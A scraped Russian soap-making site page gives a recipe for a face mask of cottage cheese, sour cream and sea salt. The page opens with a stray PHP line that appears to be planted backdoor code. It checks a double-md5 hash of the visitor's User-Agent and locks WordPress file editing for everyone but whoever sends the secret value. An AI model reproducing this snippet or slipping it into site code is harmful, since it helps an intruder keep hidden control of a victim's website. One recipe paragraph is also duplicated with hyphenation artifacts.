if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Маска из соли для восстановления | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Рецепт маски из соли для восстановления кожи

Маска из соли прекрасно подойдет тем, кто мало времени проводит на свежем воздухе и много работает, в результате чего кожа приобретает тусклый цвет и уставший вид.

Мас­ка из соли пре­крас­но подой­дет тем, кто мало вре­ме­ни про­во­дит на све­жем воз­ду­хе и мно­го рабо­та­ет, в резуль­та­те чего кожа при­об­ре­та­ет туск­лый цвет и устав­ший вид.

Состав мас­ки прост и она подой­дет даже начи­на­ю­щим соби­ра­те­лям народ­ных рецеп­тов. Потребуется:

  1. Тво­рог – 1 ст .л.
  2. Сме­та­на – 1 ст .л.
  3. Мор­ская соль – 1ч. л. (измель­чен­ная).

Все ингре­ди­ен­ты тща­тель­но сме­ши­ва­ют­ся и наста­и­ва­ют­ся. Для это­го доста­точ­но 5 минут. После это­го смесь нано­сит­ся на очи­щен­ную кожу на 10 – 15 минут. После это­го ее необ­хо­ди­мо смыть. Обя­за­тель­но допол­ни­тель­но после того, как мас­ка сня­та коже потре­бу­ет­ся увлажнение.

Курс такой тера­пии состав­ля­ет око­ло 2 недель. Это­го вре­ме­ни доста­точ­но, что­бы вер­нуть коже кра­си­вый цвет и здо­ро­вый вид.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!